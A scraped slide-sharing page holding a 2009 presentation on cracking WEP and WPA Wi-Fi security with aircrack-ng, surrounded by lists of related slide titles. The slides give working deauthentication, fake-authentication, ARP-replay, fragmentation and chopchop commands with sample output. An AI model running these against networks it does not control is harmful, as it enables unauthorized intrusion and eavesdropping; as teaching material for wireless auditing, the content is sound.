WiFi practical hacking "Show me the passwords!"DefCamp
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Securing the network for VMs or Containers
Securing the network for VMs or ContainersSecuring the network for VMs or Containers
Securing the network for VMs or ContainersMarian Marinov
 
Challenges Building Secure Mobile Applications
Challenges Building Secure Mobile ApplicationsChallenges Building Secure Mobile Applications
Challenges Building Secure Mobile ApplicationsMasabi
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesortegaalfredo
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hackingPranshu Pareek
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast TrackNovizul Evendi
 
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineShapeBlue
 
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshakedata68
 
Code Red Security
Code Red SecurityCode Red Security
Code Red SecurityAmr Ali
 

Similar to Ahmad Siddiq Wi-Fi Ninjutsu Exploitation (20)

Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Aircrack
AircrackAircrack
Aircrack
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Securing the network for VMs or Containers
Securing the network for VMs or ContainersSecuring the network for VMs or Containers
Securing the network for VMs or Containers
 
Challenges Building Secure Mobile Applications
Challenges Building Secure Mobile ApplicationsChallenges Building Secure Mobile Applications
Challenges Building Secure Mobile Applications
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slides
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
Hta r33
Hta r33Hta r33
Hta r33
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast Track
 
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
 
Vpn 3854d825
Vpn 3854d825Vpn 3854d825
Vpn 3854d825
 
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 

More from barcamp.my

Michael Reyes: 360 Persuasion
Michael Reyes: 360 PersuasionMichael Reyes: 360 Persuasion
Michael Reyes: 360 Persuasionbarcamp.my
 
Hackintosh BarcampKL
Hackintosh BarcampKLHackintosh BarcampKL
Hackintosh BarcampKLbarcamp.my
 
Ching Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 BillionChing Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 Billionbarcamp.my
 
Ikhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile OfficeIkhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile Officebarcamp.my
 
Y.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tY.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tbarcamp.my
 
Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2barcamp.my
 
Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!barcamp.my
 
James Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress TricksJames Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress Tricksbarcamp.my
 
See Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay ShirkySee Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay Shirkybarcamp.my
 
Barcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space KlBarcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space Klbarcamp.my
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency BusinessBen Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Businessbarcamp.my
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency BusinessBen Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Businessbarcamp.my
 

More from barcamp.my (12)

Michael Reyes: 360 Persuasion
Michael Reyes: 360 PersuasionMichael Reyes: 360 Persuasion
Michael Reyes: 360 Persuasion
 
Hackintosh BarcampKL
Hackintosh BarcampKLHackintosh BarcampKL
Hackintosh BarcampKL
 
Ching Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 BillionChing Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 Billion
 
Ikhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile OfficeIkhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile Office
 
Y.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tY.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don't
 
Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2
 
Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!
 
James Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress TricksJames Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress Tricks
 
See Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay ShirkySee Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay Shirky
 
Barcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space KlBarcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space Kl
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency BusinessBen Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Business
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency BusinessBen Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Business
 

Recently uploaded

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

  • 1. Special thanks to: Milw0rm | str0ke paperwork released on 24/2/2009 AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
  • 2. Contents Introduction  Conclusion steps for cracking WEP  Security of Wireless network  Owned the WPA-PSK / WPA2-PSK Key  Breaking the Simple Defenses  Exploiting Enterprise Wireless Connection (WPA-  Mac Filtering  TLS/TTLS/PEAP) Discover Hidden SSID  Exploiting CISCO LEAP  Sniffing Information on the Air  Get closer with cracking tool Refrences & Greetz to   Aircrack-ng suite  About Me / Questions  Decrypt packet with airdecap-ng  Decloak packet with airdecloak-ng  Owned the WEP Key with Simple Technique (No  Injection) Capturing method  Cracking method  Owned the WEP Key with Advanced Technique  (With Inject Method) Monitor Mode  Fake Authentication  ARP Replay Attack  Fragmentation Attack  Korek ChopChop Attack  Packetforge  ARP Request Replay with Interactive Attack  Cracking WEP key 
  • 3. Introduction This presentation will introduce to you guys  the practical techniques used by hackers to break the wireless security. You really need to have some basic  knowledge of wireless operation to understand.
  • 4. Security of Wireless Network WPA- WEP WPA2-PSK PSK WPA2-802.11x WPA-802.11x
  • 5. Breaking the Simple Defenses Bypass MAC Filtering ? Hacker Wait wait.. Lemme check with my system first Wow! You’re LEGIT! You shall pass no0b
  • 6. Breaking the Simple Defenses Bypass MAC Filtering Hacker no0b
  • 7. Breaking the Simple Defenses Discover Hidden SSID Hacker Ayam Goreng (Hidden SSID)
  • 8. Breaking the Simple Defenses Discover Hidden SSID - SSID broadcasting can be disabled in beacon frames ONLY - All other management frames (probe/responses, Hacker association and reassociations frames) contains the SSID or the network. So… what can I do is….. - Forge DISASSOCIATE frames, to a station seaming to come from the ACCESS POINT, so the station tries to reassociate (and send the SSID) - Reboot a client, so it reassociate when it initialize (if you have physical access to equipments) - RF jam (interferences) a client so it tries to reassociate (and expose SSID) - Install a fake Access Point near a client with weak signal so it tries to roam (probe requests will be sent).
  • 9. Breaking the Simple Defenses Discover Hidden SSID #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] #airodump-ng wlan0 Hacker Ayam Goreng (Hidden SSID) OSHII--
  • 10. Breaking the Simple Defenses Sniffing Information on the Air
  • 11. Get Closer with the Cracking Tool Aircrack-ng suite Aircrack-ng suite is a set of tools for auditing wireless  networks. 4 main tools for today:  Airodump-ng – Used for capturing packets  Aireplay-ng – Used for injection  De-authentication  Fake authentication  Interactive packet replay  ARP replay  KoreK Chopchop  Fragment  Packetforge-ng – Used for creating packets  Aircrack-ng – Used for recovering keys 
  • 12. Get Closer with the Cracking Tool Decrypt packets with airdecap-ng For WPA, airdecap-ng will return successful result  for only file which contains four ways handshake.
  • 13. Get Closer with the Cracking Tool Decloak packet with airdecloak-ng Cloaking is a technique to disturb cracking WEP key process.  This technique is done by injecting packets which are encrypted  with random WEP key to the network, these packets are called quot;chaffquot;. If the attacker capture these packet and do the cracking, The result will be wrong or there is no result returned. However, the aircrack team have developed the tool to deal with  this technique, it is called quot;airdecloak-ngquot;. #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap This command return two files:  - workshop-01-filtered.cap: contain the filtered packets from specific  bssid - workshop-01-cloaked.cap: contain the cloaked packets from specific  bssid
  • 14. Get Closer with the Cracking Tool Aircracking 101 PTW Attack  (-z) (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits,  Require ARP request/replay packet that you must dump all packet from airodump-ng Dictionary Attack  (WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)  Fudge Attack  (-f) Once hit 2 millions IVs, Try fudge factor to quot;-f 4quot;. Retry,  increasing the fudge factor by adding 4 to it each time. All the while, keep collecting data. Remember the golden  rule, quot;The More IVs the Betterquot;
  • 15. Pwning the WEP key WEP FFFFFFFFFUUUUUUUUUUUUU-- Hacker
  • 16. Owned the WEP Key with Simple Technique (No Injection) Lets assume that the network has a high-traffic so  we don’t need to do all those injection stuffs and so on. Preparation :  A device which supports monitor mode and can inject  packets to the network. MY Preparation:  5 years old laptop – AMD Turion64 1.6GHz 256MB  DDR (still working harmoniously despite…)  Ubuntu Intrepid Ibex 8.10  Broadcomm chipset running legacy b43 driver.
  • 17. Owned the WEP Key with Simple Technique (No Injection) Capturing Method 64-bits key – 50,000 IV packets  128-bits key – 150,000 IV packets  #airodump-ng –w workshop rausb0 ------------------------------------------------------------------------------------------ [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop BSSID STATION PWR Rate Lost Packets Probes xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747 ------------------------------------------------------------------------------------------
  • 18. Owned the WEP Key with Simple Technique (No Injection) Cracking Method #aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap -b xx:xx:xx:xx:xx:xx is the MAC address of target access point The successful cracking result is following: --------------------------------------------------------------- Opening workshop-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
  • 19. Owned the WEP Key with Advanced Technique (With Inject Method) Lets assume that the network has no traffic at all.  We can conclude about the requirements of chosen  packet for injection as following. The MAC address is associated to access point. (we can  do this by fake authentication) Send from client to access point. (the “To DS” flag is set to  1) The destination MAC address is broadcasted.  (FF:FF:FF:FF:FF:FF) The well-known packet which covers all requirements  is ARP request broadcast. We can divide the situation for injection technique into  2 scenarios. The network has ARP request.  The network has no ARP request. 
  • 20. Owned the WEP Key with Advanced Technique (With Inject Method) Monitor mode Using airmon-ng to set your wifi card to Monitor Mode  and prepare for packet injection. #airmon-ng start wlan0 11 Setting wlan0 to Monitor mode on channel 11, We must  specify the same channel as the target AP channel. Troops. Prepare for assault! Hacker Affirmative I Choose YOU!
  • 21. Owned the WEP Key with Advanced Technique (With Inject Method) Fake Authentication We can do fake authentication by the following command:  #aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –a xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card If we get successful result, our MAC address will associate  with particular access point. ------------------------------------------ 00:00:00 Sending Authentication Request 00:00:00 Authentication successful 00:00:00 Sending Association Request 00:00:00 Association successful :-) ------------------------------------------ After succeeding in fake authentication, we have to determine  what type of network we are faced with and pick the appropriate steps to deal with it.
  • 22. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Replay Attack We can use ARP replay attack by following  command: #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –b xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card Aireplay-ng will detect ARP request and use it  to perform replay attack automatically. ------------------------------------------------------------------------------------ 21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-0223-210620.cap You should also start airodump-ng to capture replies. Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps) ------------------------------------------------------------------------------------
  • 23. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack Fragment attack is used to generate key  stream in a size of 1500 bytes. So, we can use this key stream to create a packet which has size up to 1500 bytes. The command for fragment attack is: #aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
  • 24. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack The system responds with this:  ------------------------------------------------------------------------------- 21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 21:21:07 Waiting for a data packet... Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r 0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8* 0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c 0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z 0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z. Use this packet ? -------------------------------------------------------------------------------
  • 25. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack We just have to answer yes  ----------------------- Use this packet ? y ----------------------- And the successful process looks like this:  ---------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-212107.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0223-212107.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream ----------------------------------------------------------------------------------
  • 26. Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack We are able to use chopchop attack with this command:  #aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng will pick a packet for decrypting. we can should any  packet which has BSSID like our target. -------------------------------------------------------------------------------------- 21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N 0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. 0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K.... 0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. 0x0050: b09b f0f1 8b04 fc1c 0b72 .........r Use this packet ? ----------------------------------------------------------------------------------------
